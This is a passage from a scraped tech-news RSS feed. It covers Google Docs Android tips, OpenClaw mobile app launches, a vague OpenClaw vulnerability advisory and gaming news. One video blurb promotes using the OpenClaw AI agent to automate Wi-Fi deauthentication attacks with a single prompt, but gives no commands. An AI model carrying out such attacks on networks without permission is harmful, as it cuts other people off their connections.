<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/03b-google-docs-android-save-word-files.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Save as Word" class="wp-image-4191226" width="1024" height="647" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Saving any document as a Word file is also easy, once you know where to look.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You can also save the file as a PDF or other common document format from that same menu.</p>



<h2 class="wp-block-heading">Google Docs Android feature #4: The swift sender</h2>



<p>While we’re thinkin’ about dealing with different document formats, download this into your long-term memory: The next time you need to save or send a document as an actual <em>file</em> — as opposed to an in-app, collaboration-ready Google Docs share — you can save yourself the trouble of downloading and then reuploading the thing and simply send it directly from the Docs Android app.</p>



<p>The trick is to once again tap that three-dot menu icon whilst editing a file and then select that same “Share &amp; export” menu we just went over. But this time, instead of going with the “Save As” option, select “Send a copy.”</p>



<p>You can then pick from the same set of format choices we just finished exploring. And from there, Docs will allow you to choose from any compatible app on your device — everything from <a href="https://www.computerworld.com/article/1707648/best-email-and-texting-apps-for-android.html">Android email and messaging apps</a> to note-storing services like <a href="https://www.computerworld.com/article/1615550/3-fantastic-ways-notion-can-make-you-more-efficient.html">Notion</a> and <a href="https://www.computerworld.com/article/1724688/27-advanced-trello-tips-and-tricks.html">Trello</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/04-google-docs-android-send.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Share" class="wp-image-4191230" width="1024" height="997" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Send any document into any other compatible app on your phone for a simplified sharing setup.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>All it takes is one more tap from there, and your document will be on its way to the appropriate place in the format you requested — just like that.</p>



<h2 class="wp-block-heading">Google Docs Android feature #5: The local file finder</h2>



<p>Ever download a document onto your phone — be it from an email, a Slack channel, a website, or any other such source — and then later find yourself struggling to find it? Well, get this: Google’s got its own simple file finder ready and waiting for you right within the regular Docs app. Who woulda thunk, right?!</p>



<p>But oh, it be there, all righty. It’s that innocuous little folder icon within the search bar on the main Docs screen — something I must’ve seen about a thousand times before I ever thought to actually tap it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/05-google-docs-android-files.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Files" class="wp-image-4191223" width="1024" height="180" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Whoa — a built-in Docs file finder?!</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>When you do, the app will prompt you to find a saved file from either your local phone storage or from your online Drive storage. And once you select either option, you can browse through the associated place to see what’s there or search to find exactly what you’re after — no hopping over to a separate <a href="https://www.computerworld.com/article/1718187/android-file-manager-apps.html">Android file manager</a> required.</p>



<h2 class="wp-block-heading">Google Docs Android feature #6: The Drive detour</h2>



<p>Speaking of Google Drive, if you ever find yourself needing to mosey over to the full Drive interface to dig around more deeply or pull up a file that isn’t text-related, here’s a handy little secret:</p>



<p>You can actually fly from Docs directly to Drive <em>without </em>going through all the usual steps — y’know, heading back to your home screen, finding the Drive icon, and opening it up anew from there.</p>



<p>Just rely on the Docs app’s artfully hidden Drive shortcut to slash steps and zip straight between the two related interfaces. The option is quietly waiting for you within the three-line menu icon on the main Docs screen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/06-google-docs-android-drive.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Google Drive" class="wp-image-4191221" width="1024" height="707" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Docs and Drive — BFFs forever.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>And now you know.</p>



<h2 class="wp-block-heading">Google Docs Android feature #7: The account adjuster</h2>



<p>Keep that overly moist eyeball of yours in that same area of the Docs app interface for a minute, ’cause we’ve got one more sneaky shortcut worth unearthing there.</p>



<p>It’s a shortcut baked into your face — or whatever sort of image you’ve got in place for your Google account profile photo, up in the app’s upper-right corner.</p>



<p>As is the case with most Google-made apps on Android these days, you can swipe up or down on that image to flip through any additional accounts you’ve got connected on your phone. If you only have a single account set up, this obviously won’t apply to you. But if you have, say, a personal Google account and a work address or even a few different situation-specific personal or work identities, it’s a splendid way to move between ’em with next to no effort and just a single swift swipe.</p>



<h2 class="wp-block-heading">Google Docs Android feature #8: The direct document shortcut</h2>



<p>Another shortcut worth burning into your brainspace: If you find yourself working on a specific document or set of documents frequently — whether they’re evolving documents you access all the time or just specific projects on your radar at one particular moment — save yourself the steps of opening the Docs app, finding ’em there, and then tapping their titles to get into ’em and instead give yourself one-tap shortcuts to open the files directly from your home screen.</p>



<p>The option to do that is pretty buried, but it’s well worth digging up. Start by finding the document in question on the main Docs screen. Long-press it, and then look way down on the menu that pops up for the “Add to home screen” command. (Depending on the size of your phone, you might have to scroll down that menu a bit before you’ll see it appear.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/08a-google-docs-android-add-to-home-screen.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Add to home screen" class="wp-image-4191219" width="1024" height="1002" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">You’ve usually gotta scroll to find it, but Docs’ “Add to home screen” option is there and ready to save you time.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Tap that bad boy and follow the prompt to place the shortcut wherever you want it — and say “hocus pocus” for good measure, if you’re feelin’ merry — and before you know it, you’ll have an app-like icon sitting right on your home screen. Tapping it will take you directly into the document you selected, without any extra steps required.</p>



<p>You could even get ambitious and create an entire <em>folder </em>on your home screen where you store a variety of high-priority or in-progress documents.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/08b-google-docs-android-home-screen.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Home screen" class="wp-image-4191220" width="1024" height="406" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">What’s up, Docs?</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Three cheers for seconds saved!</p>



<h2 class="wp-block-heading">Google Docs Android feature #9: Quick function shortcuts</h2>



<p>Let’s keep our shortcut mojo goin’ for one more minute, shall we? You can actually follow that same pattern we just went over and and put shortcuts for common Docs commands like creating a new document or searching your existing documents right on your home screen, too. That way, you can perform the associated commands quickly and without any wasted effort opening up the app and hunting around for ’em — and what’s not to love about added efficiency?</p>



<p>These are actually part of Android’s oft-forgotten App Shortcuts system — the thing that came around way back with 2016’s Android 7.1 Nougat release and that’s still vexingly <a href="https://www.computerworld.com/article/1675828/android-app-shortcuts.html">out of sight and out of mind</a> for most of us.</p>



<p>Open up your app drawer, though, and find the Docs icon — or find the Docs icon on your home screen, if it’s there. Press and hold it, and you should see a series of options for direct shortcuts to actions <em>within</em> the app appear.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/09a-google-docs-android-home-screen-shortcuts.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Home screen shortcuts" class="wp-image-4191228" width="1024" height="558" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">All sorts of helpful Docs options are accessible right from your home screen.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You can always get to those by long-pressing the Docs icon, but if you find yourself using the functions often, you can make it even easier by pressing and holding one of ’em within that pop-up menu and then dragging it directly onto your home screen for one-touch access.</p>



<p>You could even build yourself a nifty little Docs command center for super-fast access to all the stuff you use the most:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/09b-google-docs-android-home-screen-command-bar.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Home screen command bar" class="wp-image-4191232" width="1024" height="419" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Docs, Docs, everywhere — so many options, never more than a tap away.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>And while we’ve got easy access on our minds…</p>



<h2 class="wp-block-heading">Google Docs Android feature #10: The offline on switch</h2>



<p>By default, the Docs Android app will make any files you actively work within the app available for offline use for a while — but if you’re getting ready to travel or expecting any other connectivity-challenged moments, you don’t have to rely on its judgment to make sure your stuff is accessible even without internet access.</p>



<p>From the main Docs screen, tap the three-dot icon alongside any document name and then look for the “Make available offline” option within the menu that pops up.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/10-google-docs-android-offline.jpg?quality=50&amp;strip=all&amp;w=990" alt="Google Docs Android: Offline" class="wp-image-4191229" width="990" height="1024" sizes="auto, (max-width: 990px) 100vw, 990px"><figcaption class="wp-element-caption">Pro tip: Turn offline access on <em>before</em> the need actually arises.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Tap that for any document that you expect to need and then rest easy knowing it’ll be there and available for you — no matter your current connection status.</p>



<h2 class="wp-block-heading">Google Docs Android feature #11: Wordless reactions</h2>



<p>Sometimes, a picture really is worth a thousand words. Or at least a couple hundred.</p>



<p>That’s especially true when collaborating on a document and expressing your opinions — which, let’s be honest, often come down to simple reactions like 👍 or maybe 💩.</p>



<p>Docs has allowed emoji reactions as a part of its editing process for a while now, and at some point along the way, the Android app gained the same ability. It’s just weirdly tucked away in a place where few word-minded mammals would ever find it.</p>



<p>So do this: The next time you’re working on a shared doc, try pressing and holding your finger onto any word to highlight it. (You can then use the selector icons that pop up to expand or shift your selection, if needed.)</p>



<p>Now for the tricky part: In the menu that appears alongside your selection — the one that contains “Copy” and other such commands — look for the three-line icon at its far right side.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/11a-google-docs-android-reactions-menu.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Add emoji reaction menu" class="wp-image-4191222" width="1024" height="126" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">See that little three-line icon within the text actions pop-up? </figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Tap that — and lookie what we have here: the awkwardly hidden option to add an emoji reaction! 🥳</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/11b-google-docs-android-reactions.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Add emoji reaction" class="wp-image-4191224" width="1024" height="192" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Emojis for everyone — hip, hip, hoorah!</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Hit that sneaky little thing with all your might, then select the most appropriate reaction and move on with a satisfied 😊 in your mind.</p>



<h2 class="wp-block-heading">Google Docs Android feature #12: Your in-doc AI</h2>



<p>Generative AI these days is a bit of a mixed bag, to put it politely. Google’s Gemini and other such services are arguably <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">causing more harm than good</a>, on <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">numerous levels</a>, and also just creating paths for lazy, low-quality and accuracy-challenged work.</p>



<p>But in the right scenario and with the right sort of framing, Gemini-style AI <em>can</em> <a href="https://www.computerworld.com/article/4007736/gemini-android.html">actually be useful</a>. The onus just falls squarely on <em>you</em> to determine how to most effectively use it and avoid falling into the traps of unoriginality or, worse, inaccuracy.</p>



<p>The Docs Android app now offers a direct shortcut to Gemini within its editing interface — via the starburst-shaped icon in the toolbar at the top of the screen — and with some careful considering, it might just end up being a helpful reading or editing tool for you.</p>



<p>A few suggestions that notably <em>don’t </em>involve having AI write lazy, uninspired copy on your behalf:</p>



<ul class="wp-block-list">
<li>You can use the Gemini in Docs system as a quick ‘n’ easy way to get a definition or list of synonyms for any word in front of you.</li>



<li>You can also use it to ask for context or related information — like an integrated research aide. (Just remember that AI doesn’t always get things right, so treat it as more of a starting point than a final quote-ready answer.)</li>



<li>And you can lean on it to perform tasks like summarizing or outlining a long document or helping you reorganize a document into a more logical state.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/12-google-docs-android-gemini.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Gemini" class="wp-image-4191227" width="1024" height="814" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Gemini is now available directly within Docs. Please, use it wisely.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You may still end up spending a ton of time in Docs, but at least now you’ll make the most of every second there and avoid wasting your effort on piddly little tasks that can be made more efficient. And that, as far as I’m concerned, warrants an enthusiastic 🥂 reaction — maybe even followed by a well-earned 🍪.</p>



<p><i>Get six full days of advanced Android knowledge with <a href="https://theintelligence.com/shortcut-ai/" target="_blank" rel="noreferrer noopener"><strong>my free Android Shortcut Supercourse</strong></a>. You’ll learn tons of time-saving tricks for your phone!</i></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Openclaw hat jetzt eine eigene App für Smartphones]]></title>
<description><![CDATA[Openclaw erhält nun eine eigene mobile App, die mit dem Gateway verbunden werden kann, über das der KI-Assistent betrieben wird. Dies ermöglicht es, über Sprachanrufe in Echtzeit mit Openclaw zu chatten, die Maßnahmen der Agenten zu genehmigen und den Zugriff auf Funktionen zu steuern.



Opencla...]]></description>
<link>https://tsecurity.de/de/3637604/it-nachrichten/openclaw-hat-jetzt-eine-eigene-app-fuer-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637604/it-nachrichten/openclaw-hat-jetzt-eine-eigene-app-fuer-smartphones/</guid>
<pubDate>Wed, 01 Jul 2026 08:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Openclaw erhält nun eine eigene mobile App, die mit dem Gateway verbunden werden kann, über das der KI-Assistent betrieben wird. Dies ermöglicht es, über Sprachanrufe in Echtzeit mit Openclaw zu chatten, die Maßnahmen der Agenten zu genehmigen und den Zugriff auf Funktionen zu steuern.</p>



<p>Openclaw, früher bekannt als Clawdbot und Moltbot, wurde Anfang dieses Jahres zum Internet-Hit. Das Open-Source-KI-Tool ermöglicht die Erstellung von KI-Agenten, die Apps, Webbrowser und Online-Dienste eigenständig steuern können, um beispielsweise einen Kalender zu verwalten, Reisen zu buchen und mit anderen KI-Agenten in sozialen Netzwerken zu interagieren.</p>



<p>Die Openclaw-App ist sowohl <a href="https://play.google.com/store/apps/details?id=ai.openclaw.app&amp;hl=gsw">hier</a> im Google Play Store als auch <a href="https://apps.apple.com/us/app/openclaw-ai-that-does-things/id6780396132">hier </a>im App Store von Apple erhältlich.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung Just Wiped Its Instagram Feed]]></title>
<description><![CDATA[Samsung, in an attempt to build more hype for its upcoming lineup of foldable devices, has taken drastic measures and wiped its entire Instagram feed. To be honest, I couldn’t tell you how many photos/reels the brand had posted, but alas, it’s all gone. In a post sent out to media, Samsung says t...]]></description>
<link>https://tsecurity.de/de/3637079/it-nachrichten/samsung-just-wiped-its-instagram-feed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637079/it-nachrichten/samsung-just-wiped-its-instagram-feed/</guid>
<pubDate>Wed, 01 Jul 2026 01:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Samsung, in an attempt to build more hype for its upcoming lineup of foldable devices, has taken drastic measures and wiped its entire Instagram feed. To be honest, I couldn’t tell you how many photos/reels the brand had posted, but alas, it’s all gone. In a post sent out to media, Samsung says that, “This...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/30/samsung-just-wiped-its-instagram-feed/">Samsung Just Wiped Its Instagram Feed</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw is finally available on Android and iOS]]></title>
<description><![CDATA[The free open source agentic program is finally invading your phone.]]></description>
<link>https://tsecurity.de/de/3636963/ai-nachrichten/openclaw-is-finally-available-on-android-and-ios/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636963/ai-nachrichten/openclaw-is-finally-available-on-android-and-ios/</guid>
<pubDate>Wed, 01 Jul 2026 00:02:48 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The free open source agentic program is finally invading your phone.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Releases Its Official App for iPhone and iPad Devices]]></title>
<description><![CDATA[OpenClaw, the popular personal artificial intelligence assistant, has officially launched its native application for the iPhone. Previously known as Clawdbot, the tool required users to rely on chat workarounds to access their local setups on the go.



Now, this dedicated application allows you ...]]></description>
<link>https://tsecurity.de/de/3636068/ios-mac-os/openclaw-releases-its-official-app-for-iphone-and-ipad-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636068/ios-mac-os/openclaw-releases-its-official-app-for-iphone-and-ipad-devices/</guid>
<pubDate>Tue, 30 Jun 2026 17:11:58 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenClaw, the popular personal artificial intelligence assistant, has officially launched its native application for the iPhone. Previously known as Clawdbot, the tool required users to rely on chat workarounds to access their local setups on the go.



Now, this dedicated application allows you to easily connect to your private gateway directly from your phone, keeping full control over your data, keys, and permissions. For Apple fans, it offers a much better mobile experience.




https://twitter.com/openclaw/status/2071688039114342592




The new app turns your phone into a secure node



With the new software, you can quickly pair your device using a QR code or a setup code. Once connected, you can chat with your assistant, use real-time voice modes, and review automated action approvals right from your screen. You also have the option to share links, text, and media straight into the system.



Because the service prioritizes local control, it runs the gateway on your own hardware rather than relying on a distant cloud server. You can grant the software specific access to your camera, calendar, contacts, photos, or location only when you actually need those features. This design creates a highly private way to bring powerful automated tools to your mobile devices, including the iPad and the Apple Watch.



By bringing a native interface to mobile platforms, OpenClaw makes it much simpler to manage complex workflows while you are away from your main computer. Anyone interested can download the tool for free right now from the App Store.]]></content:encoded>
</item>
<item>
<title><![CDATA[„Schlechteste App, die ich genutzt habe“: Openclaws Android-App verärgert Nutzer]]></title>
<description><![CDATA[Die Verantwortlichen hinter Openclaw haben dedizierte iOS- und Android-Apps für den KI-Assistenten veröffentlicht. Doch die Android-Variante ist etwas anders.]]></description>
<link>https://tsecurity.de/de/3635422/it-nachrichten/schlechteste-app-die-ich-genutzt-habe-openclaws-android-app-veraergert-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635422/it-nachrichten/schlechteste-app-die-ich-genutzt-habe-openclaws-android-app-veraergert-nutzer/</guid>
<pubDate>Tue, 30 Jun 2026 13:31:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Verantwortlichen hinter Openclaw haben dedizierte iOS- und Android-Apps für den KI-Assistenten veröffentlicht. Doch die Android-Variante ist etwas anders.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] OpenClaw: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in OpenClaw ausnutzen, um erweiterte Rechte zu erlangen, beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, Daten offenzulegen oder zu manipulieren oder andere, nicht näher spezifizierte Angriffe durchzuführen.]]></description>
<link>https://tsecurity.de/de/3635382/it-security-nachrichten/neu-hoch-openclaw-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635382/it-security-nachrichten/neu-hoch-openclaw-mehrere-schwachstellen/</guid>
<pubDate>Tue, 30 Jun 2026 13:23:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in OpenClaw ausnutzen, um erweiterte Rechte zu erlangen, beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, Daten offenzulegen oder zu manipulieren oder andere, nicht näher spezifizierte Angriffe durchzuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-Powered Deauth Attack 💻🔥]]></title>
<description><![CDATA[Author: zSecurity - Bewertung: 16x - Views:122 Manually executing a Wi-Fi deauthentication attack takes time and multiple terminal commands. In this short, we break down how to use the OpenClaw AI agent to completely automate the process and kick any device off a network with a single natural lan...]]></description>
<link>https://tsecurity.de/de/3635201/videos/ai-powered-deauth-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635201/videos/ai-powered-deauth-attack/</guid>
<pubDate>Tue, 30 Jun 2026 12:18:11 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: zSecurity - Bewertung: 16x - Views:122 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/nD10V6aXYIk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Manually executing a Wi-Fi deauthentication attack takes time and multiple terminal commands. In this short, we break down how to use the OpenClaw AI agent to completely automate the process and kick any device off a network with a single natural language prompt. <br />
<br />
Want to level up your red team skills and learn to build AI hacking agents? 💬 Join me in the Hacking Masterclass: https://zsecurity.org/courses/masterclass-membership/<br />
<br />
<br />
#CyberSecurity #EthicalHacking #RedTeaming #WiFiHacking #ArtificialIntelligence #PenetrationTesting<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw: Die offiziellen Apps für iOS und Android starten holprig]]></title>
<description><![CDATA[Die neuen Smartphone-Apps von OpenClaw versprechen die volle Kontrolle über lokale KI-Assistenten auf dem iPhone und Android-Geräten. Doch der Start verläuft alles andere als reibungslos. Fehlerhafte Menüs und Kopplungsprobleme sorgen für Kritik.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3635151/it-security-nachrichten/openclaw-die-offiziellen-apps-fuer-ios-und-android-starten-holprig/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635151/it-security-nachrichten/openclaw-die-offiziellen-apps-fuer-ios-und-android-starten-holprig/</guid>
<pubDate>Tue, 30 Jun 2026 12:08:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159665.html"><img hspace="5" border="0" align="left" alt="Ki, Künstliche Intelligenz, AI, Artificial Intelligence, Open Source, KI-Agent, OpenClaw" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/90830.png"></a>
			Die neuen Smartphone-Apps von OpenClaw versprechen die volle Kontrolle über lokale KI-Assistenten auf dem iPhone und <a href="https://winfuture.de/special/android/" title="Android Special">Android-Geräten</a>. Doch der Start verläuft alles andere als reibungslos. Fehlerhafte Menüs und Kopplungsprobleme sorgen für Kritik.			(<a href="https://winfuture.de/news,159665.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw reveals iOS and Android mobile apps at last — but initial reviews make for tough reading]]></title>
<description><![CDATA[OpenAI's done it, Anthropic is doing it... OpenClaw now has a mobile app to let you control your AI agents remotely.]]></description>
<link>https://tsecurity.de/de/3635134/it-nachrichten/openclaw-reveals-ios-and-android-mobile-apps-at-last-but-initial-reviews-make-for-tough-reading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635134/it-nachrichten/openclaw-reveals-ios-and-android-mobile-apps-at-last-but-initial-reviews-make-for-tough-reading/</guid>
<pubDate>Tue, 30 Jun 2026 12:02:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI's done it, Anthropic is doing it... OpenClaw now has a mobile app to let you control your AI agents remotely.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw: Open Source-KI-Agent jetzt auch nativ auf iOS]]></title>
<description><![CDATA[Der beliebte Open-Source-KI-Agent OpenClaw macht den nächsten großen Schritt: Mit einer neuen, nativen iOS-App hält das Tool nun auch auf iPhones und iPads Einzug. Bisher mussten Nutzer und Nutzerinnen auf Workarounds wie Telegram oder WhatsApp zurückgreifen, um unterwegs auf OpenClaw zuzugreifen...]]></description>
<link>https://tsecurity.de/de/3634982/ios-mac-os/openclaw-open-source-ki-agent-jetzt-auch-nativ-auf-ios/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634982/ios-mac-os/openclaw-open-source-ki-agent-jetzt-auch-nativ-auf-ios/</guid>
<pubDate>Tue, 30 Jun 2026 10:53:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der beliebte Open-Source-KI-Agent OpenClaw macht den nächsten großen Schritt: Mit einer neuen, nativen iOS-App hält das Tool nun auch auf iPhones und iPads Einzug. Bisher mussten Nutzer und Nutzerinnen auf Workarounds wie Telegram oder WhatsApp zurückgreifen, um unterwegs auf OpenClaw zuzugreifen. Die neue App ersetzt diese Umwege und bietet eine nahtlose Integration in Apples Ökosystem. […]</p>
<p>Der Beitrag <a href="https://www.appgefahren.de/openclaw-open-source-ki-agent-jetzt-auch-nativ-auf-ios-401566.html">OpenClaw: Open Source-KI-Agent jetzt auch nativ auf iOS</a> erschien zuerst auf <a href="https://www.appgefahren.de/">appgefahren.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘I felt like Orpheus’: how the designer of Gears of War bounced back from studio closure by producing Hadestown]]></title>
<description><![CDATA[After suffering the schadenfreude of gamers online, the Tony-winning Broadway musical offered redemption to Cliff Bleszinski‘It was utterly heartbreaking, to be honest, and it certainly didn’t help with my drinking. I’ll leave it at that.” Cliff Bleszinski is recalling the launch of LawBreakers, ...]]></description>
<link>https://tsecurity.de/de/3634977/it-nachrichten/i-felt-like-orpheus-how-the-designer-of-gears-of-war-bounced-back-from-studio-closure-by-producing-hadestown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634977/it-nachrichten/i-felt-like-orpheus-how-the-designer-of-gears-of-war-bounced-back-from-studio-closure-by-producing-hadestown/</guid>
<pubDate>Tue, 30 Jun 2026 10:47:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After suffering the schadenfreude of gamers online, the Tony-winning Broadway musical offered redemption to Cliff Bleszinski</p><p>‘It was utterly heartbreaking, to be honest, and it certainly didn’t help with my drinking. I’ll leave it at that.” Cliff Bleszinski is recalling the launch of LawBreakers, the arena first-person shooter he put out in 2017. It had been his first project as the CEO of his own studio, Boss Key Productions. Before that, he was the creative figurehead behind hugely successful sci-fi shooter series, Gears of War, when he was known to millions of gamers as CliffyB.</p><p>“I retired from Epic and all of it, and I missed making neat stuff,” he says. “And my agent at the time was needling me: ‘Come on, you want to get back in, have your own studio? Look at what [Hideo] Kojima’s doing.’ And I was like: ‘OK, if Kojima can do it, so can I.’ Such hubris, right?”</p> <a href="https://www.theguardian.com/games/2026/jun/30/designer-gears-of-war-hadestown-cliff-bleszinski">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw for iOS: The viral open-source AI agent comes to iPhone and iPad]]></title>
<description><![CDATA[OpenClaw, a self-hosted personal AI assistant that connects to existing chat apps, is now available on iPhone, iPad and Apple Watch. The release brings chat, real-time voice conversations, approvals, device capabilities, and private automations to iOS. Connecting OpenClaw to iPhone…
Read more →
T...]]></description>
<link>https://tsecurity.de/de/3634927/it-security-nachrichten/openclaw-for-ios-the-viral-open-source-ai-agent-comes-to-iphone-and-ipad/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634927/it-security-nachrichten/openclaw-for-ios-the-viral-open-source-ai-agent-comes-to-iphone-and-ipad/</guid>
<pubDate>Tue, 30 Jun 2026 10:20:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw, a self-hosted personal AI assistant that connects to existing chat apps, is now available on iPhone, iPad and Apple Watch. The release brings chat, real-time voice conversations, approvals, device capabilities, and private automations to iOS. Connecting OpenClaw to iPhone…</p>
